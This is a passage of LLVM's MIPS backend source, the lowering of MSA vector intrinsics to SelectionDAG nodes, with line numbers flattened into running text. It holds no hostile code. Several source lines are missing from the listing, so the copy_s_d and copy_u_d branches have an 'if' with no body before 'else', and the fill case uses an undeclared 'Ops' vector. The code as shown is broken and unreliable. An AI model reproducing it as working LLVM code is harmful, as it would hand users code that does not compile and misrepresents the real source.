Intrinsic::mips_cle_s_d: 1640  return DAG.getSetCC(DL, Op->getValueType(0), Op->getOperand(1), 1641  Op->getOperand(2), ISD::SETLE); 1642  case Intrinsic::mips_clei_s_b: 1643  case Intrinsic::mips_clei_s_h: 1644  case Intrinsic::mips_clei_s_w: 1645  case Intrinsic::mips_clei_s_d: 1646  return DAG.getSetCC(DL, Op->getValueType(0), Op->getOperand(1), 1647  lowerMSASplatImm(Op, 2, DAG, true), ISD::SETLE); 1648  case Intrinsic::mips_cle_u_b: 1649  case Intrinsic::mips_cle_u_h: 1650  case Intrinsic::mips_cle_u_w: 1651  case Intrinsic::mips_cle_u_d: 1652  return DAG.getSetCC(DL, Op->getValueType(0), Op->getOperand(1), 1653  Op->getOperand(2), ISD::SETULE); 1654  case Intrinsic::mips_clei_u_b: 1655  case Intrinsic::mips_clei_u_h: 1656  case Intrinsic::mips_clei_u_w: 1657  case Intrinsic::mips_clei_u_d: 1658  return DAG.getSetCC(DL, Op->getValueType(0), Op->getOperand(1), 1659  lowerMSASplatImm(Op, 2, DAG), ISD::SETULE); 1660  case Intrinsic::mips_clt_s_b: 1661  case Intrinsic::mips_clt_s_h: 1662  case Intrinsic::mips_clt_s_w: 1663  case Intrinsic::mips_clt_s_d: 1664  return DAG.getSetCC(DL, Op->getValueType(0), Op->getOperand(1), 1665  Op->getOperand(2), ISD::SETLT); 1666  case Intrinsic::mips_clti_s_b: 1667  case Intrinsic::mips_clti_s_h: 1668  case Intrinsic::mips_clti_s_w: 1669  case Intrinsic::mips_clti_s_d: 1670  return DAG.getSetCC(DL, Op->getValueType(0), Op->getOperand(1), 1671  lowerMSASplatImm(Op, 2, DAG, true), ISD::SETLT); 1672  case Intrinsic::mips_clt_u_b: 1673  case Intrinsic::mips_clt_u_h: 1674  case Intrinsic::mips_clt_u_w: 1675  case Intrinsic::mips_clt_u_d: 1676  return DAG.getSetCC(DL, Op->getValueType(0), Op->getOperand(1), 1677  Op->getOperand(2), ISD::SETULT); 1678  case Intrinsic::mips_clti_u_b: 1679  case Intrinsic::mips_clti_u_h: 1680  case Intrinsic::mips_clti_u_w: 1681  case Intrinsic::mips_clti_u_d: 1682  return DAG.getSetCC(DL, Op->getValueType(0), Op->getOperand(1), 1683  lowerMSASplatImm(Op, 2, DAG), ISD::SETULT); 1684  case Intrinsic::mips_copy_s_b: 1685  case Intrinsic::mips_copy_s_h: 1686  case Intrinsic::mips_copy_s_w: 1688  case Intrinsic::mips_copy_s_d: 1689  if (Subtarget.hasMips64()) 1690  // Lower directly into VEXTRACT_SEXT_ELT since i64 is legal on Mips64. 1692  else { 1693  // Lower into the generic EXTRACT_VECTOR_ELT node and let the type 1694  // legalizer and EXTRACT_VECTOR_ELT lowering sort it out. 1695  return DAG.getNode(ISD::EXTRACT_VECTOR_ELT, SDLoc(Op), 1696  Op->getValueType(0), Op->getOperand(1), 1697  Op->getOperand(2)); 1698  } 1699  case Intrinsic::mips_copy_u_b: 1700  case Intrinsic::mips_copy_u_h: 1701  case Intrinsic::mips_copy_u_w: 1703  case Intrinsic::mips_copy_u_d: 1704  if (Subtarget.hasMips64()) 1705  // Lower directly into VEXTRACT_ZEXT_ELT since i64 is legal on Mips64. 1707  else { 1708  // Lower into the generic EXTRACT_VECTOR_ELT node and let the type 1709  // legalizer and EXTRACT_VECTOR_ELT lowering sort it out. 1710  // Note: When i64 is illegal, this results in copy_s.w instructions 1711  // instead of copy_u.w instructions. This makes no difference to the 1712  // behaviour since i64 is only illegal when the register file is 32-bit. 1713  return DAG.getNode(ISD::EXTRACT_VECTOR_ELT, SDLoc(Op), 1714  Op->getValueType(0), Op->getOperand(1), 1715  Op->getOperand(2)); 1716  } 1717  case Intrinsic::mips_div_s_b: 1718  case Intrinsic::mips_div_s_h: 1719  case Intrinsic::mips_div_s_w: 1720  case Intrinsic::mips_div_s_d: 1721  return DAG.getNode(ISD::SDIV, DL, Op->getValueType(0), Op->getOperand(1), 1722  Op->getOperand(2)); 1723  case Intrinsic::mips_div_u_b: 1724  case Intrinsic::mips_div_u_h: 1725  case Intrinsic::mips_div_u_w: 1726  case Intrinsic::mips_div_u_d: 1727  return DAG.getNode(ISD::UDIV, DL, Op->getValueType(0), Op->getOperand(1), 1728  Op->getOperand(2)); 1729  case Intrinsic::mips_fadd_w: 1730  case Intrinsic::mips_fadd_d: 1731  // TODO: If intrinsics have fast-math-flags, propagate them. 1732  return DAG.getNode(ISD::FADD, DL, Op->getValueType(0), Op->getOperand(1), 1733  Op->getOperand(2)); 1734  // Don't lower mips_fcaf_[wd] since LLVM folds SETFALSE condcodes away 1735  case Intrinsic::mips_fceq_w: 1736  case Intrinsic::mips_fceq_d: 1737  return DAG.getSetCC(DL, Op->getValueType(0), Op->getOperand(1), 1738  Op->getOperand(2), ISD::SETOEQ); 1739  case Intrinsic::mips_fcle_w: 1740  case Intrinsic::mips_fcle_d: 1741  return DAG.getSetCC(DL, Op->getValueType(0), Op->getOperand(1), 1742  Op->getOperand(2), ISD::SETOLE); 1743  case Intrinsic::mips_fclt_w: 1744  case Intrinsic::mips_fclt_d: 1745  return DAG.getSetCC(DL, Op->getValueType(0), Op->getOperand(1), 1746  Op->getOperand(2), ISD::SETOLT); 1747  case Intrinsic::mips_fcne_w: 1748  case Intrinsic::mips_fcne_d: 1749  return DAG.getSetCC(DL, Op->getValueType(0), Op->getOperand(1), 1750  Op->getOperand(2), ISD::SETONE); 1751  case Intrinsic::mips_fcor_w: 1752  case Intrinsic::mips_fcor_d: 1753  return DAG.getSetCC(DL, Op->getValueType(0), Op->getOperand(1), 1754  Op->getOperand(2), ISD::SETO); 1755  case Intrinsic::mips_fcueq_w: 1756  case Intrinsic::mips_fcueq_d: 1757  return DAG.getSetCC(DL, Op->getValueType(0), Op->getOperand(1), 1758  Op->getOperand(2), ISD::SETUEQ); 1759  case Intrinsic::mips_fcule_w: 1760  case Intrinsic::mips_fcule_d: 1761  return DAG.getSetCC(DL, Op->getValueType(0), Op->getOperand(1), 1762  Op->getOperand(2), ISD::SETULE); 1763  case Intrinsic::mips_fcult_w: 1764  case Intrinsic::mips_fcult_d: 1765  return DAG.getSetCC(DL, Op->getValueType(0), Op->getOperand(1), 1766  Op->getOperand(2), ISD::SETULT); 1767  case Intrinsic::mips_fcun_w: 1768  case Intrinsic::mips_fcun_d: 1769  return DAG.getSetCC(DL, Op->getValueType(0), Op->getOperand(1), 1770  Op->getOperand(2), ISD::SETUO); 1771  case Intrinsic::mips_fcune_w: 1772  case Intrinsic::mips_fcune_d: 1773  return DAG.getSetCC(DL, Op->getValueType(0), Op->getOperand(1), 1774  Op->getOperand(2), ISD::SETUNE); 1775  case Intrinsic::mips_fdiv_w: 1776  case Intrinsic::mips_fdiv_d: 1777  // TODO: If intrinsics have fast-math-flags, propagate them. 1778  return DAG.getNode(ISD::FDIV, DL, Op->getValueType(0), Op->getOperand(1), 1779  Op->getOperand(2)); 1780  case Intrinsic::mips_ffint_u_w: 1781  case Intrinsic::mips_ffint_u_d: 1782  return DAG.getNode(ISD::UINT_TO_FP, DL, Op->getValueType(0), 1783  Op->getOperand(1)); 1784  case Intrinsic::mips_ffint_s_w: 1785  case Intrinsic::mips_ffint_s_d: 1786  return DAG.getNode(ISD::SINT_TO_FP, DL, Op->getValueType(0), 1787  Op->getOperand(1)); 1788  case Intrinsic::mips_fill_b: 1789  case Intrinsic::mips_fill_h: 1790  case Intrinsic::mips_fill_w: 1791  case Intrinsic::mips_fill_d: { 1792  EVT ResTy = Op->getValueType(0); 1794  Op->getOperand(1)); 1795  1796  // If ResTy is v2i64 then the type legalizer will break this node down into 1797  // an equivalent v4i32. 1798  return DAG.getBuildVector(ResTy, DL, Ops); 1799  } 1800  case Intrinsic::mips_fexp2_w: 1801  case Intrinsic::mips_fexp2_d: { 1802  // TODO: If intrinsics have fast-math-flags, propagate them. 1803  EVT ResTy = Op->getValueType(0); 1804  return DAG.getNode( 1805  ISD::FMUL, SDLoc(Op), ResTy, Op->getOperand(1), 1806  DAG.getNode(ISD::FEXP2, SDLoc(Op), ResTy, Op->getOperand(2))); 1807  } 1808  case Intrinsic::mips_flog2_w: 1809  case Intrinsic::mips_flog2_d: 1810  return DAG.getNode(ISD::FLOG2, DL, Op->getValueType(0), Op->getOperand(1)); 1811  case Intrinsic::mips_fmadd_w: 1812  case Intrinsic::mips_fmadd_d: 1813  return DAG.getNode(ISD::FMA, SDLoc(Op), Op->getValueType(0), 1814  Op->getOperand(1), Op->getOperand(2), Op->getOperand(3)); 1815  case Intrinsic::mips_fmul_w: 1816  case Intrinsic::mips_fmul_d: 1817  // TODO: If intrinsics have fast-math-flags, propagate them. 1818  return DAG.getNode(ISD::FMUL, DL, Op->getValueType(0), Op->getOperand(1), 1819  Op->getOperand(2)); 1820  case Intrinsic::mips_fmsub_w: 1821  case Intrinsic::mips_fmsub_d: { 1822  // TODO: If intrinsics have fast-math-flags, propagate them. 1823  EVT ResTy = Op->getValueType(0); 1824  return DAG.getNode(ISD::FSUB, SDLoc(Op), ResTy, Op->getOperand(1), 1825  DAG.getNode(ISD::FMUL, SDLoc(Op), ResTy, 1826  Op->getOperand(2), Op->getOperand(3))); 1827  } 1828  case Intrinsic::mips_frint_w: 1829  case Intrinsic::mips_frint_d: 1830  return DAG.getNode(ISD::FRINT, DL, Op->getValueType(0), Op->getOperand(1)); 1831  case Intrinsic::mips_fsqrt_w: 1832  case Intrinsic::mips_fsqrt_d: 1833  return DAG.getNode(ISD::FSQRT, DL, Op->getValueType(0), Op->getOperand(1)); 1834  case Intrinsic::mips_fsub_w: 1835  case Intrinsic::mips_fsub_d: 1836  // TODO: If intrinsics have fast-math-flags, propagate them. 1837  return DAG.getNode(ISD::FSUB, DL, Op->getValueType(0), Op->getOperand(1), 1838  Op->getOperand(2)); 1839  case Intrinsic::mips_ftrunc_u_w: 1840  case Intrinsic::mips_ftrunc_u_d: 1841  return DAG.getNode(ISD::FP_TO_UINT, DL, Op->getValueType(0), 1842  Op->getOperand(1)); 1843  case Intrinsic::mips_ftrunc_s_w: 1844  case Intrinsic::mips_ftrunc_s_d: 1845  return DAG.getNode(ISD::FP_TO_SINT, DL, Op->getValueType(0), 1846  Op->getOperand(1)); 1847  case Intrinsic::mips_ilvev_b: 1848  case Intrinsic::mips_ilvev_h: 1849  case Intrinsic::mips_ilvev_w: 1850  case Intrinsic::mips_ilvev_d: 1851  return DAG.getNode(MipsISD::ILVEV, DL, Op->getValueType(0), 1852  Op->getOperand(1), Op->getOperand(2)); 1853  case Intrinsic::mips_ilvl_b: 1854  case Intrinsic::mips_ilvl_h: 1855  case Intrinsic::mips_ilvl_w: 1856  case Intrinsic::mips_ilvl_d: 1857  return DAG.getNode(MipsISD::ILVL, DL, Op->getValueType(0), 1858  Op->getOperand(1), Op->getOperand(2)); 1859  case Intrinsic::mips_ilvod_b: 1860  case Intrinsic::mips_ilvod_h: 1861  case Intrinsic::mips_ilvod_w: 1862  case Intrinsic::mips_ilvod_d: 1863  return DAG.getNode(MipsISD::ILVOD, DL, Op->getValueType(0), 1864  Op->getOperand(1), Op->getOperand(2)); 1865  case Intrinsic::mips_ilvr_b: 1866  case Intrinsic::mips_ilvr_h: 1867  case Intrinsic::mips_ilvr_w: 1868  case Intrinsic::mips_ilvr_d: 1869  return DAG.getNode(MipsISD::ILVR, DL, Op->getValueType(0), 1870  Op->getOperand(1), Op->getOperand(2)); 1871  case Intrinsic::mips_insert_b: 1872  case Intrinsic::mips_insert_h: 1873  case Intrinsic::mips_insert_w: 1874  case Intrinsic::mips_insert_d: 1875  return DAG.getNode(ISD::INSERT_VECTOR_ELT, SDLoc(Op), Op->getValueType(0), 1876  Op->getOperand(1), Op->getOperand(3), Op->getOperand(2)); 1877  case Intrinsic::mips_insve_b: 1878  case Intrinsic::mips_insve_h: 1879  case Intrinsic::mips_insve_w: 1880  case Intrinsic::mips_insve_d: { 1881  // Report an error for out of range values. 1882  int64_t Max; 1883  switch (Intrinsic) { 1884  case Intrinsic::mips_insve_b: Max = 15; break; 1885  case Intrinsic::mips_insve_h: Max = 7; break; 1886  case Intrinsic::mips_insve_w: Max = 3; break; 1887  case Intrinsic::mips_insve_d: Max = 1; break; 1888  default: llvm_unreachable("Unmatched intrinsic"); 1889  } 1890  int64_t Value = cast<ConstantSDNode>(Op->getOperand(2))->getSExtValue(); 1891  if (Value < 0 || Value > Max) 1892  report_fatal_error("Immediate out of range"); 1893  return DAG.getNode(MipsISD::INSVE, DL, Op->getValueType(0), 1894  Op->getOperand(1), Op->getOperand(2), Op->getOperand(3), 1895  DAG.getConstant(0, DL, MVT::i32)); 1896  } 1897  case Intrinsic::mips_ldi_b: 1898  case Intrinsic::mips_ldi_h: 1899  case Intrinsic::mips_ldi_w: 1900  case Intrinsic::mips_ldi_d: 1901  return lowerMSASplatImm(Op, 1, DAG, true); 1902  case Intrinsic::mips_lsa: 1903  case Intrinsic::mips_dlsa: { 1904  EVT ResTy = Op->getValueType(0); 1905  return DAG.getNode(ISD::ADD, SDLoc(Op), ResTy, Op->getOperand(1), 1906  DAG.getNode(ISD::SHL, SDLoc(Op), ResTy, 1907  Op->getOperand(2), Op->getOperand(3))); 1908  } 1909  case Intrinsic::mips_maddv_b: 1910  case Intrinsic::mips_maddv_h: 1911  case Intrinsic::mips_maddv_w: 1912  case Intrinsic::mips_maddv_d: { 1913  EVT ResTy = Op->getValueType(0); 1914  return DAG.getNode(ISD::ADD, SDLoc(Op), ResTy, Op->getOperand(1), 1915  DAG.getNode(ISD::MUL, SDLoc(Op), ResTy, 1916  Op->getOperand(2), Op->getOperand(3))); 1917  } 1918  case Intrinsic::mips_max_s_b: 1919  case Intrinsic::mips_max_s_h: 1920  case Intrinsic::mips_max_s_w: 1921  case Intrinsic::mips_max_s_d: 1922  return DAG.getNode(MipsISD::VSMAX, DL, Op->getValueType(0), 1923  Op->getOperand(1), Op->getOperand(2)); 1924  case Intrinsic::mips_max_u_b: 1925  case Intrinsic::mips_max_u_h: 1926  case Intrinsic::mips_max_u_w: 1927  case Intrinsic::mips_max_u_d: 1928  return DAG.getNode(MipsISD::VUMAX, DL, Op->getValueType(0), 1929  Op->getOperand(1), Op->getOperand(2)); 1930  case Intrinsic::mips_maxi_s_b: 1931  case Intrinsic::mips_maxi_s_h: 1932  case Intrinsic::mips_maxi_s_w: 1933  case Intrinsic::mips_maxi_s_d: 1934  return DAG.getNode(MipsISD::VSMAX, DL, Op->getValueType(0), 1935  Op->getOperand(1), lowerMSASplatImm(Op, 2, DAG, true)); 1936  case Intrinsic::mips_maxi_u_b: 1937  case Intrinsic::mips_maxi_u_h: 1938  case Intrinsic::mips_maxi_u_w: 1939  case Intrinsic::mips_maxi_u_d: 1940  return DAG.getNode(MipsISD::VUMAX, DL, Op->getValueType(0), 1941  Op->getOperand(1), lowerMSASplatImm(Op, 2, DAG)); 1942  case Intrinsic::mips_min_s_b: 1943  case Intrinsic::mips_min_s_h: 1944  case Intrinsic::mips_min_s_w: 1945  case Intrinsic::mips_min_s_d: 1946  return DAG.getNode(MipsISD::VSMIN, DL, Op->getValueType(0), 1947  Op->getOperand(1), Op->getOperand(2)); 1948  case Intrinsic::mips_min_u_b: 1949  case Intrinsic::mips_min_u_h: 1950  case Intrinsic::mips_min_u_w: 1951  case Intrinsic::mips_min_u_d: 1952  return DAG.getNode(MipsISD::VUMIN, DL, Op->getValueType(0), 1953  Op->getOperand(1), Op->getOperand(2)); 1954  case Intrinsic::mips_mini_s_b: 1955  case Intrinsic::mips_mini_s_h: 1956  case Intrinsic::mips_mini_s_w: 1957  case Intrinsic::mips_mini_s_d: 1958  return DAG.getNode(MipsISD::VSMIN, DL, Op->getValueType(0), 1959  Op->getOperand(1), lowerMSASplatImm(Op, 2, DAG, true)); 1960  case Intrinsic::mips_mini_u_b: 1961  case Intrinsic::mips_mini_u_h: 1962  case Intrinsic::mips_mini_u_w: 1963  case Intrinsic::mips_mini_u_d: 1964  return DAG.getNode(MipsISD::VUMIN, DL, Op->getValueType(0), 1965  Op->getOperand(1), lowerMSASplatImm(Op, 2, DAG)); 1966  case Intrinsic::mips_mod_s_b: 1967  case Intrinsic::mips_mod_s_h: 1968  case Intrinsic::mips_mod_s_w: 1969  case Intrinsic::mips_mod_s_d: 1970  return DAG.getNode(ISD::SREM, DL, Op->getValueType(0), Op->getOperand(1), 1971  Op->getOperand(2)); 1972  case Intrinsic::mips_mod_u_b: 1973  case Intrinsic::mips_mod_u_h: 1974  case Intrinsic::mips_mod_u_w: 1975  case Intrinsic::mips_mod_u_d: 1976  return DAG.getNode(ISD::UREM, DL, Op->getValueType(0), Op->getOperand(1), 1977  Op->getOperand(2)); 1978  case Intrinsic::mips_mulv_b: 1979  case Intrinsic::mips_mulv_h: 1980  case Intrinsic::mips_mulv_w: 1981  case Intrinsic::mips_mulv_d: 1982  return DAG.getNode(ISD::MUL, DL, Op->getValueType(0), Op->getOperand(1), 1983  Op->getOperand(2)); 1984  case Intrinsic::mips_msubv_b: 1985  case Intrinsic::mips_msubv_h: 1986  case Intrinsic::mips_msubv_w: 1987  case Intrinsic::mips_msubv_d: { 1988  EVT ResTy = Op->getValueType(0); 1989  return DAG.getNode(ISD::SUB, SDLoc(Op), ResTy, Op->getOperand(1), 1990  DAG.getNode(ISD::MUL, SDLoc(Op), ResTy, 1991  Op->getOperand(2), Op->getOperand(3))); 1992  } 1993  case Intrinsic::mips_nlzc_b: 1994  case Intrinsic::mips_nlzc_h: 1995  case Intrinsic::mips_nlzc_w: 1996  case Intrinsic::mips_nlzc_d: 1997  return DAG.getNode(ISD::CTLZ, DL, Op->getValueType(0), Op->getOperand(1)); 1998  case Intrinsic::mips_nor_v: { 1999  SDValue Res = DAG.getNode(ISD::OR, DL, Op->getValueType(0), 2000  Op->getOperand(1), Op->getOperand(2)); 2001  return DAG.getNOT(DL, Res, Res->getValueType(0)); 2002  } 2003  case Intrinsic::mips_nori_b: { 2004  SDValue Res = DAG.getNode(ISD::OR, DL, Op->getValueType(0), 2005  Op->getOperand(1), 2006  lowerMSASplatImm(Op, 2, DAG)); 2007  return DAG.getNOT(DL, Res, Res->getValueType(0)); 2008  } 2009  case Intrinsic::mips_or_v: 2010  return DAG.getNode(ISD::OR, DL, Op->getValueType(0), Op->getOperand(1), 2011  Op->getOperand(2)); 2012  case Intrinsic::mips_ori_b: 2013  return DAG.getNode(ISD::OR, DL, Op->getValueType(0), 2014  Op->getOperand(1), lowerMSASplatImm(Op, 2, DAG)); 2015  case Intrinsic::mips_pckev_b: 2016  case Intrinsic::mips_pckev_h: 2017  case Intrinsic::mips_pckev_w: 2018  case Intrinsic::mips_pckev_d: 2019  return DAG.getNode(MipsISD::PCKEV, DL, Op->getValueType(0), 2020  Op->getOperand(1), Op->getOperand(2)); 2021  case Intrinsic::mips_pckod_b: 2022  case Intrinsic::mips_pckod_h: 2023  case Intrinsic::mips_pckod_w: 2024  case Intrinsic::mips_pckod_d: 2025  return DAG.getNode(MipsISD::PCKOD, DL, Op->getValueType(0), 2026  Op->getOperand(1), Op->getOperand(2)); 2027  case Intrinsic::mips_pcnt_b: 2028  case Intrinsic::mips_pcnt_h: 2029  case Intrinsic::mips_pcnt_w: 2030  case Intrinsic::mips_pcnt_d: 2031  return DAG.getNode(ISD::CTPOP, DL, Op->getValueType(0), Op->getOperand(1)); 2032  case Intrinsic::mips_sat_s_b: 2033  case Intrinsic::mips_sat_s_h: 2034  case Intrinsic::mips_sat_s_w: 2035  case Intrinsic::mips_sat_s_d: 2036  case Intrinsic::mips_sat_u_b: 2037  case Intrinsic::mips_sat_u_h: 2038  case Intrinsic::mips_sat_u_w: 2039  case Intrinsic::mips_sat_u_d: { 2040  // Report an error for out of range values. 2041  int64_t Max; 2042  switch (Intrinsic) { 2043  case Intrinsic::mips_sat_s_b: 2044  case Intrinsic::mips_sat_u_b: Max = 7; break; 2045  case Intrinsic::mips_sat_s_h: 2046  case Intrinsic::mips_sat_u_h: Max = 15; break; 2047  case Intrinsic::mips_sat_s_w: 2048  case Intrinsic::mips_sat_u_w: Max = 31; break; 2049  case Intrinsic::mips_sat_s_d: 2050  case Intrinsic::mips_sat_u_d: Max = 63; break; 2051  default: llvm_unreachable("Unmatched intrinsic"); 2052  } 2053  int64_t Value = cast<ConstantSDNode>(Op->getOperand(2))->getSExtValue(); 2054  if (Value < 0 || Value > Max) 2055  report_fatal_error("Immediate out of range"); 2056  return SDValue(); 2057  } 2058  case Intrinsic::mips_shf_b: 2059  case Intrinsic::mips_shf_h: 2060  case Intrinsic::mips_shf_w: { 2061  int64_t Value = cast<ConstantSDNode>(Op->getOperand(2))->getSExtValue(); 2062  if (Value < 0 || Value > 255) 2063  report_fatal_error("Immediate out of range"); 2064  return DAG.getNode(MipsISD::SHF, DL, Op->getValueType(0), 2065  Op->getOperand(2), Op->getOperand(1)); 2066  } 2067  case Intrinsic::mips_sldi_b: 2068  case Intrinsic::mips_sldi_h: 2069  case Intrinsic::mips_sldi_w: 2070  case Intrinsic::mips_sldi_d: { 2071  // Report an error for out of range values. 2072  int64_t Max; 2073  switch (Intrinsic) { 2074  case Intrinsic::mips_sldi_b: Max = 15; break; 2075  case Intrinsic::mips_sldi_h: Max = 7; break; 2076  case Intrinsic::mips_sldi_w: Max = 3; break; 2077  case Intrinsic::mips_sldi_d: Max = 1; break; 2078  default: llvm_unreachable("Unmatched intrinsic"); 2079  } 2080  int64_t Value = cast<ConstantSDNode>(Op->getOperand(3))->getSExtValue(); 2081  if (Value < 0 || Value > Max) 2082  report_fatal_error("Immediate out of range"); 2083  return SDValue(); 2084  } 2085  case Intrinsic::mips_sll_b: 2086  case Intrinsic::mips_sll_h: 2087  case Intrinsic::mips_sll_w: 2088  case Intrinsic::mips_sll_d: 2089  return DAG.getNode(ISD::SHL, DL, Op->getValueType(0), Op->getOperand(1), 2090  truncateVecElts(Op, DAG)); 2091  case Intrinsic::mips_slli_b: 2092  case Intrinsic::mips_slli_h: 2093  case Intrinsic::mips_slli_w: 2094  case Intrinsic::mips_slli_d: 2095  return DAG.getNode(ISD::SHL, DL, Op->getValueType(0), 2096  Op->getOperand(1), lowerMSASplatImm(Op, 2, DAG)); 2097  case Intrinsic::mips_splat_b: 2098  case Intrinsic::mips_splat_h: 2099  case Intrinsic::mips_splat_w: 2100  case Intrinsic::mips_splat_d: 2101  // We can't lower via VECTOR_SHUFFLE because it requires constant shuffle 2102  // masks, nor can we lower via BUILD_VECTOR & EXTRACT_VECTOR_ELT because 2103  // EXTRACT_VECTOR_ELT can't extract i64's on MIPS32. 2104  // Instead we lower to MipsISD::VSHF and match from there. 2105  return DAG.getNode(MipsISD::VSHF, DL, Op->getValueType(0), 2106  lowerMSASplatZExt(Op, 2, DAG), Op->getOperand(1), 2107  Op->getOperand(1)); 2108  case Intrinsic::mips_splati_b: 2109  case Intrinsic::mips_splati_h: 2110  case Intrinsic::mips_splati_w: 2111  case Intrinsic::mips_splati_d: 2112  return DAG.getNode(MipsISD::VSHF, DL, Op->getValueType(0), 2113  lowerMSASplatImm(Op, 2, DAG), Op->getOperand(1), 2114  Op->getOperand(1)); 2115  case Intrinsic::mips_sra_b: 2116  case Intrinsic::mips_sra_h: 2117  case Intrinsic::mips_sra_w: 2118  case Intrinsic::mips_sra_d: 2119  return DAG.getNode(ISD::SRA, DL, Op->getValueType(0), Op->getOperand(1), 2120  truncateVecElts(Op, DAG)); 2121  case Intrinsic::mips_srai_b: 2122  case Intrinsic::mips_srai_h: 2123  case Intrinsic::mips_srai_w: 2124  case Intrinsic::mips_srai_d: 2125  return DAG.getNode(ISD::SRA, DL, Op->getValueType(0), 2126  Op->getOperand(1), lowerMSASplatImm(Op, 2, DAG)); 2127  case Intrinsic::mips_srari_b: 2128  case Intrinsic::mips_srari_h: 2129  case Intrinsic::mips_srari_w: 2130  case Intrinsic::mips_srari_d: { 2131  // Report an error for out of range values. 2132  int64_t Max; 2133  switch (Intrinsic) { 2134  case Intrinsic::mips_srari_b: Max = 7; break; 2135  case Intrinsic::mips_srari_h: Max = 15; break; 2136  case Intrinsic::mips_srari_w: Max = 31; break; 2137  case Intrinsic::mips_srari_d: Max = 63; break; 2138  default: llvm_unreachable("Unmatched intrinsic"); 2139  } 2140  int64_t Value = cast<ConstantSDNode>(Op->getOperand(2))->getSExtValue(); 2141  if (Value < 0 || Value > Max) 2142  report_fatal_error("Immediate out of range"); 2143  return SDValue(); 2144  } 2145  case Intrinsic::mips_srl_b: 2146  case Intrinsic::mips_srl_h: 2147  case Intrinsic::mips_srl_w: 2148  case Intrinsic::mips_srl_d: 2149  return DAG.getNode(ISD::SRL, DL, Op->getValueType(0), Op->getOperand(1), 2150  truncateVecElts(Op, DAG)); 2151  case Intrinsic::mips_srli_b: 2152  case Intrinsic::mips_srli_h: 2153  case Intrinsic::mips_srli_w: 2154  case Intrinsic::mips_srli_d: 2155  return DAG.getNode(ISD::SRL, DL, Op->getValueType(0), 2156  Op->getOperand(1), lowerMSASplatImm(Op, 2, DAG)); 2157  case Intrinsic::mips_srlri_b: 2158  case Intrinsic::mips_srlri_h: 2159  case Intrinsic::mips_srlri_w: 2160  case Intrinsic::mips_srlri_d: { 2161  // Report an error for out of range values. 2162  int64_t Max; 2163  switch (Intrinsic) { 2164  case Intrinsic::mips_srlri_b: Max = 7; break; 2165  case Intrinsic::mips_srlri_h: Max = 15; break; 2166  case Intrinsic::mips_srlri_w: Max = 31; break; 2167  case Intrinsic::mips_srlri_d: Max = 63; break; 2168  default: llvm_unreachable("Unmatched intrinsic"); 2169  } 2170  int64_t Value = cast<ConstantSDNode>(Op->getOperand(2))->getSExtValue(); 2171  if (Value < 0 || Value > Max) 2172  report_fatal_error("Immediate out of range"); 2173  return SDValue(); 2174  } 2175  case Intrinsic::mips_subv_b: 2176  case Intrinsic::mips_subv_h: 2177  case Intrinsic::mips_subv_w: 2178  case Intrinsic::mips_subv_d: 2179  return DAG.getNode(ISD::SUB, DL, Op->getValueType(0), Op->getOperand(1), 2180  Op->getOperand(2)); 2181  case Intrinsic::mips_subvi_b: 2182  case Intrinsic::mips_subvi_h: 2183  case Intrinsic::mips_subvi_w: 2184  case Intrinsic::mips_subvi_d: 2185  return DAG.getNode(ISD::SUB, DL, Op->getValueType(0), 2186  Op->getOperand(1), lowerMSASplatImm(Op, 2, DAG)); 2187  case Intrinsic::mips_vshf_b: 2188  case Intrinsic::mips_vshf_h: 2189  case Intrinsic::mips_vshf_w: 2190  case Intrinsic::mips_vshf_d: 2191  return DAG.getNode(MipsISD::VSHF, DL, Op->getValueType(0), 2192  Op->getOperand(1), Op->getOperand(2), Op->getOperand(3)); 2193  case Intrinsic::mips_xor_v: 2194  return DAG.getNode(ISD::XOR, DL, Op->getValueType(0), Op->getOperand(1), 2195  Op->getOperand(2)); 2196  case Intrinsic::mips_xori_b: 2197  return DAG.getNode(ISD::XOR, DL, Op->getValueType(0), 2198  Op->getOperand(1), lowerMSASplatImm(Op, 2, DAG)); 2199  case Intrinsic::thread_pointer: { 2200  EVT PtrVT = getPointerTy(DAG.getDataLayout()); 2201  return DAG.getNode(MipsISD::ThreadPointer, DL, PtrVT); 2202  } 2203  } 2204 } 2205  2206 static SDValue lowerMSALoadIntr(SDValue Op, SelectionDAG &DAG, unsigned Intr, 2207  const MipsSubtarget &Subtarget) { 2208  SDLoc DL(Op); 2209  SDValue ChainIn = Op->getOperand(0); 2210  SDValue Address = Op->getOperand(2); 2211  SDValue Offset = Op->getOperand(3); 2212  EVT ResTy = Op->getValueType(0); 2213  EVT PtrTy = Address->getValueType(0); 2214  2215  // For N64 addresses have the underlying type MVT::i64. This intrinsic 2216  // however takes an i32 signed constant offset. The actual type of the 2217  // intrinsic is a scaled signed i10. 2218  if (Subtarget.isABI_N64()) 2219  Offset = DAG.getNode(ISD::SIGN_EXTEND, DL, PtrTy, Offset); 2220  2221  Address = DAG.getNode(ISD::ADD, DL, PtrTy, Address, Offset); 2222  return DAG.getLoad(ResTy, DL, ChainIn, Address, MachinePointerInfo(), 2223  /* Alignment = */ 16); 2224 } 2225  2226 SDValue MipsSETargetLowering::lowerINTRINSIC_W_CHAIN(SDValue Op, 2227  SelectionDAG &DAG) const { 2228  unsigned Intr = cast<ConstantSDNode>(Op->getOperand(1))->getZExtValue(); 2229  switch (Intr) { 2230  default: 2231  return SDValue(); 2232  case Intrinsic::mips_extp: 2233  return lowerDSPIntr(Op, DAG, MipsISD::EXTP); 2234  case Intrinsic::mips_extpdp: 2235  return lowerDSPIntr(Op, DAG, MipsISD::EXTPDP); 2236  case Intrinsic::mips_extr_w: 2237  return lowerDSPIntr(Op, DAG, MipsISD::EXTR_W); 2238  case Intrinsic::mips_extr_r_w: 2239  return lowerDSPIntr(Op, DAG, MipsISD::EXTR_R_W); 2240  case Intrinsic::mips_extr_rs_w: 2241  return lowerDSPIntr(Op, DAG, MipsISD::EXTR_RS_W); 2242  case Intrinsic::mips_extr_s_h: 2243  return lowerDSPIntr(Op, DAG, MipsISD::EXTR_S_H); 2244  case Intrinsic::mips_mthlip: 2245  return lowerDSPIntr(Op, DAG, MipsISD::MTHLIP); 2246  case Intrinsic::mips_mulsaq_s_w_ph: 2247  return lowerDSPIntr(Op, DAG, MipsISD::MULSAQ_S_W_PH); 2248  case Intrinsic::mips_maq_s_w_phl: 2249  return lowerDSPIntr(Op, DAG, MipsISD::MAQ_S_W_PHL); 2250  case Intrinsic::mips_maq_s_w_phr: 2251  return lowerDSPIntr(Op, DAG, MipsISD::MAQ_S_W_PHR); 2252  case Intrinsic::mips_maq_sa_w_phl: 2253  return lowerDSPIntr(Op, DAG, MipsISD::MAQ_SA_W_PHL); 2254  case Intrinsic::mips_maq_sa_w_phr: 